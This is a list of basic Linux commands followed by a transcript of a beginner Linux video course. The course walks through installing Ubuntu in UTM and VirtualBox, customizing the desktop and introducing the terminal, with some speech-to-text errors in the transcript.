    Here are some basic and essential commands:

    • ls: Lists files and directories.
    • ls -a: Includes hidden files.
    • ls -l: Uses a long listing format, displaying permissions, size, and modification date.
    • cd: Changes the current directory.
    • cd ..: Moves up one directory level.
    • cd -: Flips between the previous and current directory.
    • mkdir: Creates a new directory. The -p option creates nested directories.
    • touch: Creates a new file.
    • rm: Removes files.
    • rmdir: Removes empty directories.
    • cp: Copies files.
    • sudo: Executes a command with elevated privileges.

    Each command may have options and arguments to modify its behavior. To understand how to use a command effectively, you can consult its manual page with the man command.
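    For example, to read the manual for ls:

        man ls        # open the full manual page (press q to quit)
        ls --help     # print a quick summary of options (GNU coreutils)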

    Linux For Beginners – Full Course [NEW]

    The Original Text

    what’s going guys assalamualaikum welcome to this  Linux crash course where I’m going to take you   from complete beginner to understanding Linux this  is a course that abs and I put together and it’s   currently 10 hours which a bunch of exercises  if you don’t know Linux and also if you are   afraid of the terminal or the black screen then  you are in big trouble so this course will make   sure that you master Linux and whether you want to  become a software engineer devops engineer backend   front end it doesn’t really matter Linux is a  must and don’t you worry because we’ve got you   covered if you’re new to this channel literally  just take 2 seconds and subscribe and also smash   the like button so we can keep on providing you  content like this without further Ado let’s off   this video okie dokie let’s go ahead and kick off  this course with this presentation which I want   to go through so that you have a bit of background  about Linux so Linux it’s a powerful and flexible   operating system that was developed by lonus tals  in 1991 so the name Linux comes from the Creator   Linus and since 1991 Linux has grown into a robust  and reliable platform used by millions worldwide   as you’ll see in a second the cool thing about  Linux unlike operating systems such as Windows Mac   OS is that Linux is open source developers around  the world contribute to improve and customize the   operating system and it has a Vibrant Community  of contributors and I’ll talk to you in a second   about distributions as well because it plays a big  part since Linux is open source the key features   of Linux are stability security the ability of  changing it to your needs and performance so   servers around the world prefer Linux due due to  its performance so who uses Linux well interned   Giants scientific research companies financial  institutions government agencies educations and   the platform that you are using right now so  Amigo’s code is actually deployed on a Linux   server so you look at Google meta AWS NASA  and obviously Amigo’s code and pretty much   like every single company out there majority of  them I can guarantee you that their software is   being deployed on Linux it might be a different  flavor of Linux but it will be Linux and the   reason really is because of the flexibility  and it’s secure so this is why companies opt   to choose Linux and the cool thing about Linux  is that it’s open source as I’ve mentioned but   it’s also used on a wide range of devices from  smartphones to service and also Raspberry Pi so   if you’ve ever used a Raspberry Pi the operating  system on this tiny computer is Linux Linux has   something called distributions and these are  different flavors the most popular flavor of   Linux is Ubuntu and you have the iunu server or  the desktop which comes with a graphical user   interface and this distribution is what we’re  going to use and is the most popular out there   but obviously depending on the company that  you work for the software will be deployed on   a different flavor of Linux to customize their  needs but there are also other distributions   such as Fedora Debian Linux Mint and plenty  of others and this is a quick overview about Linux cool before before we actually proceed  I just want to let you know that the actual   10 hour of course is available on our brand  new website and I’m going to leave a coupon   and a link as well where you can basically go  and check for yourself because many of your   students already have engaged with the 
course  they’ve been learning a lot and to be honest   the positive has been really really great so far  so we are coming up with something really huge   and we decided that Linux had to be part of this  something and here Amigo’s codee we want to make   sure that you become the best engineer that you  can be details will be under the destion of this video okie dokie for the next two sections  we’re going to focus on Windows users as   well as Mac users and just pick the operating  system that you are using and go straight to   that section because the setup will be the  exact same thing so I’m going to show you   how to get Linux and you bu to up and running  on your operating system if you want to watch   both sections feel free to do so uh but in this  course I just want to make sure that there’s no   issues when it comes to Windows or Mac because  there’s a huge debate which uh is better and   also um after those two sections you’ll see  how to rent a server of the cloud okay so   if you don’t to use nor um yunto or Linux on  your local machine but you prefer to rent it   from the cloud I’m also going to show you how  to do so cool this is pretty much it let’s get started in order for us to install Ubuntu on  a Mac operating system we’re going to use this   application called UTM which allows you to  securely run operating systems on your Mac   whether it’s window Window XP which I really  doubt that you’re going to do windows I think   this is Windows 10 maybe you can also run your  buntu which is the one that we’re going to run   and also like old operating systems in here also  Mac as well so you can virtualize Mac and um I’ll   basically walk you through how to use it and  install yuntu right here which is what we need   in order to get up and running with Linux cool  so in here what we’re going to do is click on   download and you can download from the Mac Store  then pretty much save this anywhere so in my case   I’m going to save it on my desktop and just give  a second to download cool then on my desktop I’m   going to open up this UTM DMG there we go and all  I’m going to do is drag this to applications and   job done now let me close this and also I’m  going to eject UTM and also I’m going to get   rid of this UTM file in here and now I’m going to  press command and then space and we can search for   UTM and then I’m going to open and I’m going to  continue and there we go we successfully installed UTM the next thing that we need is to install  Ubuntu navigate to ubuntu.com and in this page   in here we can download yuntu by clicking on  download and then what I want you to do is   let’s together download the Ubuntu server and  I’ll show you how to get the desktop from the   Ubuntu Server so here you can choose Mac and  windows so I’ve got the arm architecture so   I’m just going to choose arm in here if you  are on regular Mac and windows you can just   basically download your Windows server for  the corresponding architecture and operating   system so here I’m going to click on arm and  you can read more about it in here so this is   the I think this is the long-term support 2204 and  then two and right here you can see that you can   download the long-term support or I think this  is the latest version in here so in my case it   doesn’t really matter which version I download so  I’m just going to download the long-term support   in here so this my bugs who knows so here let’s  just download and I’m going to store this onto my desktop now just give it a minute or so so  my 
internet is quite slow and you can see the   download still uh in progress but once this  finishes I will um come back to you awesome   so this is done also what I want to show you  is within UTM you can click on on browse UTM   gallery or you can get to it via so in here  if I switch to the UTM official website in   here click on gallery and basically this gives  you a gallery of I think the operating systems   which are currently supported so you can see Arch  Linux Debian Fedora Kali Linux which is quite nice   actually and then you have Mac OS you have Ubuntu  I think this is the older version actually you’ve   got the 20.01 which is the long-term support  Windows 10 11 7 and XP so if you want to go   back to olden days feel free to do so but  we just downloaded yuntu from the official   website which is good and also have a look the  architecture in here so arm 64 x64 right so make   sure to pick the one which is corresponding to  you so if you want to have for example Windows   as well feel free to download an experiment or  a different version of Linux so K Linux which   is quite nice actually feel free to do it but  in my case I’m going to stick with traditional   buntu and next what we’re going to do is to  create a virtual machine and have Linux up and running right we have UTM as well as the iso  image in here for Ubuntu let’s create a brand new   virtual machine and in here we want to virtualize  never emulate so here this is slower but can run   other CPU architectures so in our case we want to  virtualize and the operating system is going to be   Linux leave these and check and in here boot ISO  image open up the iso that we’ve just downloaded   right so here browse and I’ve just opened up  the Ubuntu 22.0 4.2 the next step is going to   be continue and here for memory usually you should  give half of your available memory so in my case   I’m just going to leave four gigs I’ve seen that  it works quite well and I do actually have 32 but   I’m not giving 16 so I’m just going to leave four  in here and CPU course I’m G to leave the default   and here if you want to enable Hardware open  Gil acceleration you can but there are known   issues at the moment so I’m not going to choose  it continue 64 gig so this is the size of the dis   continue and here there’s no shared directory path  continue and for the name in here what I’m going   to do is say YouTu and then the version so 20.0  four dot and then two awesome so you can double   check all of these settings and I think they’re  looking good click on Save and there we go so at   this point you can see that we have the VM in here  so we’re going to start it in a second we can see   the status is stopped the architecture arm the  machine memory 4 gig the size this will increase   in a second and there’s no shared directory but  the cd/ DVD is yuntu which is this one in here so   one more thing that I want to do is so before  we play I want to go to settings so in here   click on settings and you can change the name  if you want to in here and uh all I want really   is within this play I’m going to choose retina  mode and this will give me the best performance   cool so save and I’m good to go next let’s go  ahead and install Ubuntu within our virtual machine oky dokie now the next step for us is to  click on play in here or in here and this should   open this window so in here you can see that  currently so I’m just gonna leave the the screen   like this so currently you can see that it says  press option and um I think it’s enter 
for us to   release the cursor So currently my cursor is not  visible right and the way that I can interact with   this UI is by using my keyboard so the down arror  in here and the app Arrow right so if you want   your cursor back you just press control and then  option I think control option there we go you can   see that now I have the mouse in here cool let me  just close this in here for a second and I’m going   to Center this like so and now what we’re going  to do is try or install Ubuntu Server so I’m going   to press enter on my keyboard so display output  is not active just where a second and we should   have a second screen there we go you can see that  now we have this other the screen and basically   now we can basically configure the installation  process so in my case I’m going to use English UK   and here so for you whatever country you are just  use the correct country basically so here English   UK for me press enter Then the layout and the  variant so for the keyboard I want to leave as   default and at the bottom you can see that I can  flick between done and back so I’m just going to   say done and I’m going to leave the default  so I want the default installation for you Bo   to server not the minimized so just press enter  and here there’s no need to configure the network   connections continue no need to configure proxy  and also the mirror address just leave as default   enter and in here configure a guided storage so  here I’m going to use the entire disk and leave   as default so just with my errors go all the way  to done enter and here now we have the summary   and you can see the configuration basically 60 gig  and I think the available free space is 30 gig and   you can see there and at this point I you sure  you want to continue I’m going to say continue   now for the name I’m going to say Amigos code the  server name I’m going to say Amigos code the usern   name Amigos code the password I’m going to have  something very short and Easy in here and then   go to done continue and I’m not going to enable  yuntu Pro continue continue there’s no need to   install open SSH server because we don’t need to  remote access this server that we are installing   so here done and also we have a list of available  software that we can install so for example micro   Kates nexcloud Docker you can see AWS CLI in here  so a CLI Google Cloud SDK we don’t need none of   these also postgress which is right here so if  you want to install these by all means feel free   to take but for me I’m going to leave everything  as default done and at this point you can see that   what he doing is installing the system so just  wait for a second and I’m going to fast forward   this step oky doie so you can see that the  installation is now complete and at this point   what it’s doing is downloading and installing  security updates so it’s really up to you whether   you want to wait for this or not but in my case  I think it’s you know the best practice for you   to have everything patched and um updated so I’m  just going to wait and then I’ll tell you what are   the next steps so this might take a while so just  sit back and relax all right so this is now done   and you can see that installation is complete and  we can even say reboot now but don’t don’t click   reboot now what we need to do is so basically we  have to close this so again close this window will   kill the virtual machine which is fine okay now  open UTM once more and you can see that we have   the Ubuntu virtual machine in 
here and if I open  this up once more so all I want to show you is   that this will take us to the exact same screen  to install yuntu server now we don’t want this so   close this and what we have to do is in here  so CD DVD clear so we have to remove the iso   image and at this point feel free to delete this  so here I’m going to delete this and that’s it   cool so this is pretty much the installation for  Ubuntu next let’s get our Ubuntu Server up been running cool so make sure that this CD for/ DVD  is empty before you press continue or before   you press play so let’s just play this there  we go and I can close this and I’m going to   Center things there we go and at this point we  should see something different there we go now   have a look yuntu the version that we installed  and then it says Amigos code login cool so here   what we need to do is I think we have to add  the username which is Amigos code then press   enter followed by by the password so my password  was I’m not going to tell you basically but it’s   a very simple one so here you don’t see the  password that you type so just make sure that   you have the username and the password press  enter and check this out so now we are inside   and we’ve managed to log in cool so at this point  this is actually yuntu server right so there’s no   graphical user interface and um that’s it right  so later you’ll see that when you SSH into the   servers this is what you get right so this black  screen and that’s it now obviously for us I want   to basically install a graphical user interface  so that basically you see the Ubuntu UI and um   the applications I I’ll show you the terminal  and whatnot but in a shell this is yuntu server   so at this point you can type commands so here  for example if you type LS for example just L   and then s press enter nothing happens if you type  PWD so these are commands you learn about these uh   later but if I press enter you can see that I’m  within home/ Amigos code if I type CD space dot   dot so two dots enter you can see that now if I  type PWD I’m within home okay so this is pretty   much the yuntu server and this is a Linux box  that we can interact with but as I said we want   to install a graphical user interface to simplify  things for now and that’s what we’re going to do next within the official page for UTM navigate  to support in here and I’ll give you this link   so you can follow along but basically they give  you the installation Pro process and things that   you should be aware when working with UTM now  one of the things is if we click on guides or   expand you can see that you have the different  operating systems so Debian 11 Fedora Cali yuntu   Windows 10 and 11 so we installed 2204 so let’s  open that and it doesn’t really matter just click   on your BTU and whatever version here um that  you have installed this will be the exact same   thing okay so just select yuntu anything that says  going to in here cool so if I scroll down in here   so they have a section so we’ve done all of this  creating a new virtual machine and basically here   installing you B to desktop if you install you B  to server then at the end of the installation you   will not have the graphical user interface to  install we need to run these commands in here   so sudu apt and then update and then install and  then reboot awesome let’s go ahead and run these   commands cool so in here within in Yun to server  let me see if I can increase the font size for   this so control and then plus and it doesn’t 
look  like I can but I’ll show you how to increase the   font size for this in a second but here let’s  type together PSE sudo and then a and then   update press enter and then it’s asking me for  the password for Amigos code so make sure you   add the password for your username press enter  and you can see that it’s basically performing   the update now now the update basically is used  to update the package index files on the system   which contains information about the available  packages and their versions cool so you can see   that 43 packages can be upgraded now if you  want to upgrade the packages we can run PSE   sudo and then AP so let me just remove the mouse  from there ABT space and then up and then grade   and here I’m going to press enter and we could  actually use flags and we could say Dy but for   now let’s just keep it simple and later you learn  about these commands so press enter and you can   see that it says that the following packages will  be upgraded right so you see the list of all the   packages do you want to continue I can say why  why for yes cool now just give it a second and   now it’s actually upgrading these packages to  their latest versions so it’s almost done and   and now it says which Services should be restarted  leave everything as default and say okay so I’m   just going to press the tab and then okay cool  that’s it so now the last thing that we need to   do is to install Yun desktop so this point type  sud sudo a and then install Ubuntu Dash and then   desk and then top press enter and you can see  that it gives us a prompt I’m going to say w   and now we’ve go prompt and it says do you want  to continue I’m going to say y for yes and now   we just have to wait until it installs the Yun  to desktop and this is pretty much the graphical   user interface that will allows us to interact  with our operating system like we are using for   example the Mac OS right so this is the graphical  user interface but equally we do have the terminal   so if I open up the terminal quickly so terminal  so have a look so this is the terminal right so so   what we doing is we are basically installing the  same experience that we have within Mac OS so if   I click on the Apple logo and then basically use  all of the functionalities that this operating   system has to offer right so if I click on about  this Mac and then I can go to more info so on and   so forth so let me just cancel this and just wait  for a second until this finishes oky doie cool so   this is done and if you encounter any errors  or anything whatsoever just restart and then   run the exact same command but here you see that  there were no errors cool at this point there’s   no services to be restarted no containers and  all we have to do is re and then boot now just   wait for it and hopefully now at this point  you should go straight into the desktop okie   dokie you can see that now we managed to get the  desktop app and running cool so at this point just   click on it the password so this is my password  and I’m going to press enter hooray and we’ve   done it cool so if you managed to get this far  congratulations you have successfully installed   yuntu otherwise if you have any questions drop  me a message next let’s go ahead and set up Ubuntu okie dokie so we have yuntu desktop up  and running and from this point onwards let me   just put this as full screen and for some reason  I have to log in again again that’s fine cool so   you can see that the UI looks nice and sharp  and in here let’s 
just um basically say next   we don’t want to install the btu Pro and in  here whether you want to send information to   developers I don’t really mind to be honest  and location I’m just going to turn it off   and here it says you’re ready to go and let’s  just say done cool we have the home so here I   can just put this on this side and what we’re  going to do here is some customization this is   actually an operating system so you’ve got a  few things in here so you’ve got mail client   you’ve got files so if I click on files you  know this is a file system you know the same   as I have in my Mac so here let me just close  this and what I want to do is I want to go to   show all applications or I could just right  click in here and then I can say a few things   so one is display settings this is what I’m  mostly interested so in here I’m going to   put things a little bit bigger so fractional  scaling and here I’m going to increase this by 175% apply so that things are quite visible to  you so here keep changes and you can see that   now it’s nice and big cool so just move this in  here and it doesn’t look like it lets me right   So eventually it will let me move this but also  I can click on show all applications and I can go   to settings through here so the same thing and um  cool so you can go to keyboards you can you know   change according to your layout so I’m going to  leave my one as English UK which is fine you can   go to displays you can change the resolution if  you want to power configure that whether you want   power saver mode or not and um online accounts  so here I’m not going to connect to anything   privacy go back and I’m just showing you around  so background if you want to change the background   you’re more than welcome to do so here a couple of  different ones but for me I’m going to stick with   the default and appearance as well you can change  this right so here if you want a blue theme for   example which I kind of like to be honest or this  purple right here so let’s just actually choose   this blue for myself and for the desktop size  I’m going to say Lodge in here so that things   are visible to you okay and I can scroll down  and also icon size just as big as this and you   can show Auto Hide dock does that work probably  I don’t know right so I think it hides when yes   when this collides with this right so basically at  this point it just hides cool let me just remove   that I don’t think I need that and notifications  so you can go through and customize this the way   you want it but for us I think this is looking  good one other thing also is if you have a window   opened you can basically pull it all the way to  the left and it will just snap so if I open a   new so let’s just say I have um a new window for  example I can put this right in here and you can   see that it auto arranges for me which is kind  of nice and uh to be honest I think I’m going   to stick with the red so red not not there but I  think it was appearance yes I think this orange   or actually orange I think this orange looks nice  yeah I don’t know it’s very difficult cool so I   think I’ll just stick with this default for now  cool and um yeah so let me just close this and   this and this is pretty much it uh I don’t know  for some reason why this is not um oh actually let   me just click on arrange icons maybe that will  do it no I think it doesn’t do it because it’s   too big it doesn’t want to move but I think if I  restart then it should basically sort itself out   uh the 
other thing is so in here yes so here I can  basically remove so I’m going to remove this from   favorites same as this so stop and quit and remove  favorites the same with this and no need for help   and I think this is pretty much it awesome this  is my setup and also I think the clock is I think   it’s 1 hour behind so feel free to fix that but to  me it doesn’t really matter so this is pretty much   it if you have any questions drop me a message  but this is the configuration required for yuntu in order for us to install yuntu desktop on  Windows let’s use Virtual box which basically   allows you to install and run a large number  of guest operating systems so here you can   see uh Windows XP which I doubt you’ll ever use  Vista Windows and then Linux in here Solaris so   these are different distributions but basically we  need virtual box in order to install another guest   operating system on top of windows so navigate to  downloads and in here download the Windows host   so just give it a second and then open file there  we go I’m going to say next so the installation   process should be really straightforward and don’t  worry about this warning in here so just say say   yes and then it says missing pice dependencies  do you want to install it yes why not and then   install cool so this should take a while and you  can see that we have the shortcut being created   for us in here and we are good to go so let me  just unake this because we’re going to continue on   the next video say finish and we have successfully  installed virtual box catch me on the next one we do have virtual box installed and before I open  this application in here the next thing that we   need is the Ubuntu desktop itself so that we can  mount on top of virtual box so in here if I open   up my web browser and search for Ubuntu on Google  and basically go to ubuntu.com and you you should   see so if I accept in here you should see that  we can download so we have yunto server in here   and this is the current version as I speak and  whatever version that you see provided that is the   sorry this is not the latest this is the long-term  support but whatever long-term support you see   just download that so here go to developer and you  should see that we have yuntu desktop so click on   that and we can download yuntu desktop so you can  watch this video if you want but I’m not going to   but if I scroll down you can see that it says that  your buntu comes with everything you need to run   your organization School home or Enterprise and  you can see the UI in here so on and so forth so   let’s go ahead and download yuntu cool now if  I scroll down in here you can see that we have   this version so long-term support just download  whatever long-term support you see available so download and it should start very soon there we  go and it should take about 5 minutes or so to   complete or even less now and there we go now  let me open this on my desktop and you can see   that it’s right here awesome now that we have  Ubuntu desktop next let’s go ahead and uh use   Virtual box to install this ISO image in here  this is pretty much it catch me on the next one cool let’s open up virtual box in here  and I’ll walk you through the steps required   to get yuntu desktop up been running so if this  is the first time that you’re using virtual box   this should be completely empty so what we’re  going to do is create new and here we’re going   to name this as yuntu there we go and you can put  the version if you want but I’m 
going to leave it   as is then for the iso image is the one that we  downloaded so here let’s just select order and   then navigate to desktop and I’ve got my Ubuntu  ISO image open cool and in here you can see that   basically we can’t really select anything else  so let’s just click next and we can actually   have the username and password so in my case I’m  going to say Amigos and then code there we go and   then choose the password so if I click on this  I icon in here you can see that it says change   me right so you can change this or you can leave  it as default so in my case I’m going to leave as   change me but obviously I would never do this  and I want want to leave the host name as you   B to domain as uh what it is right now and then  next then we need to specify the base memory in   here as well as the CPU so for CPU let’s just  choose two cores in here and for memory if you   have more memory on your machine just feel free  to rank this up to maybe four gigs but for me I’m   going to leave as default next and then here it  says either to create a virtual hard disk or use   an existing or do not so in my case I’m going to  basically have 20 gigs so here I’m really saving   memory uh I don’t think there’s much space on  this Windows machine so 20 gigs I think should   be fine and uh yeah create a virtual hard disk  say next and now we have a summary you can read   through it and let’s finish cool so this is pretty  much it now you can see that it says powering VM up so just wait for a second until this is up  and running and you can see that I think it’s   done right so you can see that it’s actually  running now obviously if I click click on it and then we have this window and you can see  that it’s loading yuntu and it says mouse mouse   integration so click on here and then there as  well all right so just give her a second or so   and uh this should install successfully and there  we go you can see that this was really quick and   and here you can see that it’s installing few  things so this is now installing and basically   I’m going to leave this complete and then I’ll  come back to it so that we can proceed our setup   cool now it’s installing the system and I can  click on this button and you can see what it’s   doing on the terminal so let’s just wait until  this finishes and this should take a while for   you so for me I’m going to speed up this video but  uh you should yuntu up and running in a second and   in fact we could actually skip this all together  but I’m going to leave it finish and after a long   time of waiting it seems that it’s almost there  let’s just wait and finally we are done cool so   if you get to this point where you have your  user and then you can click on it and then in   here the password was change and then me right  so I didn’t change the password let me just show   you so change me if I press enter we should be  able to log in if the password is correct there   we go cool this is pretty much it I’m going to  leave it here and we’ll continue on the next video okie dokie so we are almost done  with the configuration so one thing that   I want to do is let’s just click on  Virtual box in here and uh click on settings and then let’s go to Advanced so under  General click on Advanced and then share clipboard   so we’re going to basically say bir directional  and the same for drag and drop so basically we   can basically drag stuff from our Windows to our  yuntu desktop and uh the same with the clipboard   say okay or actually let’s just go to 
system  and see whether we have to change something so   I don’t think we have to change anything else  and uh under storage so in here so just make   sure that this is empty so make sure that this  is empty that it doesn’t contain the iso image   in here cool audio everything should be fine if  you want to enable AUD the input feel free to   do so serial ports nothing USB shared folders and  user interface we’re going to leave everything as   is okay and in here I can just close this and uh  if I try to put this full screen in here you can   see what happens so to do this what we have to  do is install virtual box guest editions so in   here we’re not going to connect to any online  accounts let me just Skip and also I’m going   to skip the pro yuntu pro next and uh also if  you want to send data feel free but I’m not   going to send any data click on next and uh I’m  going to turn off location and there you go you   you see that it says you’re ready to go you can  use software to install apps like these so press   done and what I want to do is let’s open up the  T terminal so click on this button in here that   shows all applications and then open the terminal  so this is the terminal and with the terminal open   let me just put this full screen like that and  now what we’re going to do is type some commands   and at this point in here I don’t expect you to  know none of this because we’re going to learn   in detail how all of this works cool so the first  thing that that we want to do is is if you type   with me so P sudo and then here we’re going to say  a PT and then up and then date so if this command   in here does not work and now it’s asking me for  the password so change and then me now I’m typing   but you don’t see that I’m typing because this is  done by default because here I’m typing sensitive   information which is the password press enter  and and if it says that Amigo’s code is not in   sudo’s file this incident will be reported that’s  fine so all we have to do is so if this happens   to you type pseudo or actually sorry my bad Su and  then Dash and then here type the password again so   change and then me and or whatever password that  you added and there we go now we can type pseudo   and then add and then user so user and make sure  that add user is all together and then type Amigos   so the user in question so this is Amigos code for  me and then we want to add Amigos code to PSE sudo   just like that press enter and you can see that  this is basically added Amigos code to PSE sudo   and now it means that if I say Su and then Amigos  and then code and by the way Su just allows it to   change users and you will also learn about this  command press enter and now you can see that I’m   back to Amigos code in here and if we type PSE  sudo and then basically the the previous command   I’m just going to press the up aror this one so  P sudo AP and then update and then let’s add the   password once more so change me enter you can see  see that this time this command works so I’m going   to leave these commands that I’ve just did under  description of this video so that you can follow   along as well cool the next command that we need  to run is PSE sudo in here and then AP install   Dash and then Y and then build Dash and then  essential space and then Linux Dash and then   headers Dash and then add dollar sign and then  parenthesis and then you name space Dash and then   R and then close parentheses just like that cool  also you’ll find this command under description   of 
this video press enter and just give you a  second or so and there we go now navigate to   devices and then insert guest editions CD image  and you can see that we have this dis in here so   let’s just click on it and now what we want to do  is let’s take this file in here autorun Dosh and   then drag it to the terminal in here and let’s  see whether this works so if I so right at the   end if I press enter this doesn’t work and that’s  because I need to remove the quotes there we go so   the quote at the beginning and also the one at  the end and then press enter and it looks like   it doesn’t work so let’s just click on the dis  again and then here I’m going to right click and   then opening terminal so we have a new terminal  let me close the old one so close this terminal   and then we can close this as well and now if  I put this full screen all I want you to do is   to type dot slash and then autorun Dosh press  enter and now it’s asking me for the password   for Amigo’s code and the password was change me so  change me let me show you change me authenticate and it’s installing some modules now we have to  wait until this is complete and the last step   will be to restart our machine and uh it says  press return to close the window it seems to   be done so I’m just pressing return there we go  finished and now let’s together so in here click   on the battery icon and then let’s click on power  off restart restart and now if I restore down so   let’s just restore and and um what I want to do  is I want to put it full screen so if I maximize   now now you saw that the screen went black and uh  what we have to do is so let’s just basically make   this smaller open up virtual box and basically on  this Ubuntu which is running click on settings and   display and what we want to do is to change the  video memory now this is grade out because what   we need to do first is right click on the VM  itself and we want to stop it so stop and then   power off cool let’s switch it off now we can go  to settings and then display and now you can see   that we can change this now I’m going to put this  at 64 somewhere in the middle okay and if we click   on it so you can click here or you can start  if you want through this button just give you a second and very soon we should have so  let me just close this we don’t need this so it should start very soon there we go and  if we try to put this full screen on actually did   that for me but what I want to do is actually put  everything full screen you can see that this time   it works there we go and then if I click on Amigos  code the password was change me enter and we are   inside cool so now what we can do is go to view  and then you can say full screen mode and you   can switch in here and you can see that now all of  this is in full screen mode and we done it awesome   we successfully installed yuntu and if you want to  exit full screen you can see here I could just go   down View and then you have the keyboard shortcuts  as well but if I press on it you can see that I   came out from this and I do have access two in  here my Windows machine cool this is pretty much   it and also if you get software updata just  go and install as always but in my case I’m   going to be naughty and I want to say remind me  later this is pretty much it catch me on the next one cool in this video what I want to walk  you through is how we going to customize our   desktop so in here let’s together just put this  full screen and I’m going to switch there we go   and if 
you want to customize the look and feel  of yuntu desktop go to show applications at the   bottom and then click on settings cool now that we  have settings in here we are able to change couple   of things so you can change the network specific  information Bluetooths in here background so you   can choose for example if you don’t like this  background just choose this one for example you   can see that it changes but for my case I’m going  to stick with the default in here appearance so   appearance you can change the color theme in  here so maybe you like this color in here so   if I click on it you can see that the icons have  changed have a look right but I’m going to leave   the default in here so everything is consistent  throughout and you can change the icon size if   you want as well so I think the icon size I  think we have one icon in here so the oh icon   so if I increment this no it’s yeah the icon  size is basically this one right here on the   left right so I’m going to leave that as 64 you  can change this according to whatever you prefer   so for me it’s more about making sure that you  see everything visible in here notifications so   there’s nothing here search multitasking so you  can basically configure this uh I’m not going   to touch none of these applications so there’s  no configuration on any of these applications   in here let me just go back privacy same nothing  I’m going to change here and um online accounts   you can connect your Google account Microsoft and  whatnot sharing so there’s nothing here you can   change the the computer name if you want sound as  well power so basically you can have power saver   or not screen blank after whatever minutes screen  display and in here let’s basically scale this so   let’s say that we want 200 so apply and you can  see that things are now so big so I’m going to   keep these changes 200 and um let’s have a look  if I put this full screen what what do I get yeah   this looks nice right so 200 and then let me go  to I think it was background or sorry appearance   and then the icon size we can make a little bit  smaller now just like this you can leave it like   that uh but as as I said you could basically do  whatever you want okay so screen display and again   you can make this 100% I’m just making things  big so you can see sharply and then Mouse and   touchpad you can change the speed if you want the  keyboard so my one is so so let me just add United   Kingdom so this is my one English UK and add and  then delete this guy so remove there we go and   um printers nothing there removable media nothing  and device color profiles and obviously here I can   scroll down and you can see a bunch more right so  language region so here you can change the region   the language accessibility date and time so on and  so forth all right so also the same with users so   here we only have one user and uh you can change  the password if I’m not mistaken in here right   cool so my password is changed me I could change  for uh something better but I’ll show you how to   do all of this through the terminal which is uh  what we are here to learn how to use Linux andd   terminal let me cancel and then close this so  let’s just get rid of this from favorites I’m   going to get rid of this as well office as well  ubun to sofware as well help as well I want to C   I want to keep it clean eject there and I think  this is it awesome this is pretty much it if you   have any questions drop me a message but from now  on if you you followed the 
Mac installation, this is the exact same point, and vice versa. From now on, for both Mac and Windows users, everything should be the same, because we are using the Ubuntu desktop. This is pretty much it; I'll see you on the next one.

Okey dokey. With Linux, it's all about the terminal. Really, the reason I installed the desktop is so that you get a full operating system, but what we're going to focus on throughout this course is the terminal. As you'll see later, when we SSH into a remote server we never have the graphical user interface, so it's all about the terminal.

Cool, so what is a terminal, really? The terminal is also known as the command line interface, or CLI. If I go to Show Applications, we have Terminal, so let me pin it: right-click, Add to Favorites. The terminal is now within the favorites, and I can just click on it to open it. So what is this terminal? Here we have amigoscode@amigoscode. The terminal is a text-based interface that allows you to interact with a computer's operating system by entering commands. Let me type one command and you'll see how it works: if I type date and press Enter, this gives me the current date. That was a command (we'll learn more about commands in a second), and it allows me to interact with the operating system. Similarly, if I want to create a folder on my desktop, I can type mkdir, then tilde, slash, Desktop, slash, and then foo, for example: mkdir ~/Desktop/foo. Press Enter, and have a look, a new folder was created for us.

To be honest, we don't even need this UI. Usually you would right-click and then Move to Trash, for example, and that deletes the folder through the graphical user interface, but in reality we don't need it. Here I can just say rm (we'll go through these commands in a second): rm -r ~/Desktop/foo, and you'll learn this in a second. If I press Enter, you can see that the folder has disappeared.
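Here are those first commands again, as a copy-and-paste-able recap (foo is just an example name):

```bash
date                 # print the current date and time
mkdir ~/Desktop/foo  # create a folder called foo on the desktop
rm -r ~/Desktop/foo  # remove it again; -r (recursive) is needed for folders
```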
So this is the terminal: it allows us to interact with the operating system, and it provides a prompt, which is where we enter commands and receive the output. When we run date, we get an output; some commands don't give any output, but I'll show you other things we can do. With this we can perform a wide range of tasks, such as navigating directories, creating and modifying files, running programs, accessing system resources, and whatnot. The terminal is commonly used by developers and system administrators to perform a bunch of tasks, including software development, server administration, and automation. It's a very powerful and efficient way to work with a computer's operating system, and it's an essential tool for everyone working in programming and development, so knowing how to use the terminal is a must for you. This is the reason I've made this course: you should be doing pretty much everything through your terminal. I don't want to see you creating a folder by right-clicking in the graphical user interface, choosing New Folder, and typing the folder name, blah blah blah; that's bad. (You see, I'm actually deleting a folder using the UI right now; this is wrong, but let me just do it. There we go.) By the end of this course you will be very familiar with the terminal, so that you have all the skills required to use it, and as you'll see, a bunch of tools such as Git, Docker, and Kubernetes all have to be used through the CLI, or the terminal. Cool, this is pretty much it; catch me on the next one.

Within macOS, what I want to show you is that I also have a terminal available. If I search for Terminal, this right here is the default terminal that comes with macOS. I can type any command here and it will be executed against my operating system. If I type, say, ls (you're going to learn about ls later, but just type this command and press Enter), it lists all the contents that I have within my home directory. If I type clear, that's another command: it clears the terminal. And here I can type pwd; you've seen this one, and it prints /Users/amigoscode.

Similarly, there's another terminal available, and this one is not part of the macOS operating system, but it's the one I actually use on my machine: iTerm. This is iTerm, yet another terminal, way fancier than the default one; you can see the look is all black, and it has lots of customizations. For example, I can split the screen into two panes, and maybe three: you can see I've got one, two, three, and in these I can type ls, pwd, and cal, so I'm executing commands in three different shells (I'll talk about shells in a second). You can see that this terminal is way more powerful than the default that comes with macOS. Let me close this; I just wanted to show you the different terminals available. For Windows, what you have is the command line, or simply CMD, and it looks like this; you've probably seen it if you're on Windows. Again, this is a terminal: you can run commands, they will be executed against your operating system, and they'll perform whatever tasks you tell them to. This is pretty much it for this video; catch me on the next one.
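For reference, the handful of commands used in this demo:

```bash
ls      # list the contents of the current directory
clear   # clear the terminal screen
pwd     # print the working directory, e.g. /Users/amigoscode
cal     # print a small calendar for the current month
```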
Also, what I want to show you is that within text editors and IDEs there will always be an integrated terminal, so you don't necessarily have to use a terminal that ships with your operating system, and you don't have to install a separate one either. Here I've got VS Code (Visual Studio Code) open, and within it, if I click on Terminal and then New Terminal, you see that I do have a terminal. Here I can type the exact same commands you saw: for example, whoami. Don't worry about this command, we'll cover all of these; for now I'm just showing you the terminals. If I press Enter, you can see that this gives me amigoscode. Also, and I think this one is quite cool, within the terminal I can split the terminal, have a look, the same way you saw with iTerm, which is quite nice, and here you actually have two different shells; this one is zsh, and we'll cover shells in a second. I can delete this one, and this one as well, and they're gone. Also, one of my favorite IDEs is IntelliJ, and IntelliJ has an integrated terminal too: if I open it, you can see that we have the terminal, and I can type the same command again, whoami, press Enter, and it gives you the exact same output. Awesome, this is pretty much it about terminals; if you have any questions drop me a message, otherwise catch me on the next one.

